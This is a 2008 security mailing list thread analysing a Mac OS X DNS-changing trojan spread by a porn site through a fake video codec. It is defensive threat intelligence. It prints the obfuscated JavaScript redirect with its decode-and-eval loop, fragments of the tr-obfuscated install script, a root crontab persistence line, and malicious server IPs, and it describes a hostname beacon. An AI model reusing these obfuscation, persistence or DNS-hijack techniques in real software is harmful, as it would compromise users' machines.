[nsp-sec] [ OT ] MacOS X malware

Wed Apr 2 16:18:22 EDT 2008

Rob,

I'm sure this isn't news to you, but it might help clarify things for 
others. This is the Mac equivalent of Zlob (aka generically as 
DNSChanger). The two DNS servers given to infected hosts will be within 
the 85.255.112.0/20 network - I think almost always within 
85.255.112.0/22. Based on my observations, I'd guarantee there are over 
229 infected Macs in Minnesota alone, not to mention 50x that in Windows 
boxes.

I've heard other rumors (besides the livejournal link you provided) that 
RBN is involved with Zlob, but I've never heard more than highly 
speculative comments. Regardless, the folks behind this line of malware 
are clearly very well funded and well organized. It's getting disgusting 
how long this line of malware has been around and how many *millions*[1] 
of hosts have been infected, and yet there is little to no press 
attention given to it (and who knows how much/little LE attention). They 
own a massive number of domains, generate a huge quantity of malware, 
make millions off of numerous bogus anti-spyware programs (almost 
certainly created in house) as well as large commissions from some 
gray-ish anti-spyware, and historically, even commissions from 
affiliate networks such as (but not limited to) amazon.com's 
"Associates" program.

We have been null routing 85.255.112.0/20 for nearly two years now, as 
well as some other Intercage IP space.

Cheers,
Brian

[1] 
http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx 
provides some reference as to how big the Zlob problem is. One week 
after the Sept, 2007 MSRT was released, the Zlob family had been removed 
from 664,258 machines. This was the same month MSRT first got rid of 
Storm; that was removed from 274,372 machines in the same time period. 
Granted, Zlob had about a two year head start... (But I wonder how many 
infected machines had already been cleaned/reinstalled/recycled by then?)

Rob Thomas wrote:
> ----------- nsp-security Confidential --------
> 
> Hi, team.
> 
> Given the large number of Mac users in this community, and given that 
> this collection of dodgy web sites are infecting Windows and MacOS X, I 
> thought this was reasonably appropriate for this list.  Some folks on 
> this list might want to take action against some of these IPs.
> 
> Yes it's true - there is malware for the MacOS X platform.  While this
> report will cover a recent release, the malware itself isn't new and
> hacking MacOS X isn't new, either.
> 
> You can read a public blog post and some useful follow-ups at the
> following URL:
> 
>     <http://tacit.livejournal.com/238112.html>
> 
> Here is our analysis.  Some of these links are rude even in name, and
> all of them are unsafe.
> 
> The fun begins with at least one porn site.  The site brings the user
> through a few redirects to a site here:
> 
>     88.85.72.147
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     35415   | 88.85.72.147     | 88.85.64.0/19       | NL | ripencc  |
> 2006-02-08 | WEBAZILLA WebaZilla European Network
> 
> The page there loads some fun Javascript:
> 
>     var str=["332", "331", "331", "331", "440", "419", "436",
>     "354", "434", "433", "440", "383", "370", "381", "332",
>     "331", "331", "331", "424", "439", "432", "421", "438",
>     "427", "433", "432", "354", "443", "441", "439", "427",
>     "422", "420", "430", "444", "433", "427", "362", "435",
>     "439", "423", "436", "443", "363", "445", "332", "331",
>     "331", "331", "331", "441", "427", "432", "422", "433",
>     "441", "368", "430", "433", "421", "419", "438", "427",
>     "433", "432", "383", "361", "426", "438", "438", "434",
>     "380", "369", "369", "430", "419", "432", "422", "427",
>     "432", "425", "426", "419", "430", "430", "368", "421",
>     "433", "431", "369", "427", "432", "368", "421", "425",
>     "427", "385", "373", "361", "381", "332", "331", "331",
>     "331", "447"];
>     var temp='';
>     var gg='';
>     for (i=0; i<str.length; i++){
>        gg=str[i]-322;
>        temp=temp+String.fromCharCode(gg);
>     }
>     eval(temp);
> 
> This translates to (I've heavily obfuscated the URL below):
> 
>     var pov=0;
>     function ywuidblzoi(query){
>        window.location='h x x p : / / landinghall . com / in.cgi?3';
>     }
> 
> The host landinghall.com resolves to 88.214.202.180, located at the
> following provider:
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     23393   | 88.214.202.180   | 88.214.192.0/18     | GB | ripencc  |
> 2006-01-18 | ISPRIME - ISPrime, Inc.
> 
> In addition to the malware, the images are extremely graphic.  Consider 
> yourself warned.
> 
> The web site determines the visitor's OS and then decides which malware
> to offer.  This is masked as a video codec to play the porn
> available on this "PornTube" (their name) site.
> 
> Note well that if the browser has pop-ups blocked, there is no risk to
> MacOS X users so far as we can discern.
> 
> At this point the MacOS X user is prompted to download a disk image for
> installation.  This image is named 1023.dmg and is served from:
> 
>     64.28.178.27, 64-28-178-27-rev.cernel.net
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     27595   | 64.28.178.27     | 64.28.176.0/20      | US | arin     |
> 2005-12-29 | INTERCAGE - InterCage, Inc.
> 
> The MacOS X user *must* provide his or her password to enable the
> installation of this malware masked as a video player.  This is not a
> 0day attack - it is social engineering.
> 
> The preinstall and preupgrade scripts are the same and contain 25 lines.
> Both use an interesting obfuscation technique - the Unix tr(1) command.
> 
> The script first cat(1)'s itself and pipes bottom 23 lines of itself
> through tr(1).  The first tr(1) round does the following (I've cleaned
> this up a bit to make it more legible):
> 
>     tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
> 
> It next sets two variables:
> 
>     s1 = cx.zxx.aas.xd
>     s2 = cx.zxx.aaz.ace
> 
> The script called "1" is now run with these two variables as arguments,
> piped through tr(1) again (line split to make it more legible):
> 
>     sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
>     `echo $s2| tr qazwsxedcr 0123456789`
> 
> The tr(1) command translates those two "strings" into the following two
> IP addresses:
> 
>     s1 = 85.255.114.57
>     s2 = 85.255.112.186
> 
> Those IPs belong to:
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     27595   | 85.255.114.57    | 85.255.114.0/23     | UA | ripencc  |
> 2005-06-16 | INTERCAGE - InterCage, Inc.
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     36445   | 85.255.112.186   | 85.255.112.0/24     | UA | ripencc  |
> 2005-06-16 | CERNEL-ASN - Cernel, Inc
> 
> The script called "1" looks for some basic IPv4 settings on the Mac.
> It then replaces the DNS name servers in the netinfo database with
> 85.255.114.57 and 85.255.112.186.  Any DNS queries from the compromised
> Mac are now sent to these two name servers.
> 
> Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
> 
> These IPs are no stranger to badness.  We count 17 distinct samples in
> our malware menagerie that reference 85.255.114.57.  The host at
> 85.255.112.186 has been involved with at least 60 malware samples that
> hijack DNS settings.
> 
> If a query is made for a non-existant DNS RR, these DNS name servers
> return an answer of 64.28.185.108.
> 
>     64.28.185.108, 64-28-185-108-rev.cernel.net
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     27595   | 64.28.185.108    | 64.28.176.0/20      | US | arin     |
> 2005-12-29 | INTERCAGE - InterCage, Inc.
> 
> The script then installs itself into root's crontab as:
> 
>     * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
> 
> By default there is no root crontab on MacOS X, so this one really
> stands out.
> 
> The QuickTime.xpt script is just a copy of the "1" script.  This will
> now run once per minute, as root, ensuring the malware and the DNS
> changes aren't removed or lost for long.
> 
> A Perl script named "sendreq" is run and deleted.  This script is a
> beacon, sending the output of "uname -p" (the machine processor
> architecture name, e.g. "i386") and the hostname(1) command to a web
> server.  The web server is:
> 
>     64.28.188.220, 64-28-188-220-rev.cernel.net
> 
>     AS      | IP               | BGP Prefix          | CC | Registry |
> Allocated  | AS Name
>     27595   | 64.28.188.220    | 64.28.176.0/20      | US | arin     |
> 2005-12-29 | INTERCAGE - InterCage, Inc.
> 
> This is done as a HTTP GET command from the compromised Mac, with the
> Accept-Language: field set to the information obtained from the
> uname(1) and hostname(1) commands run on the compromised Mac.
> 
> We see at least 227 victims, mostly in the US.
> 
> Thanks,
> Rob.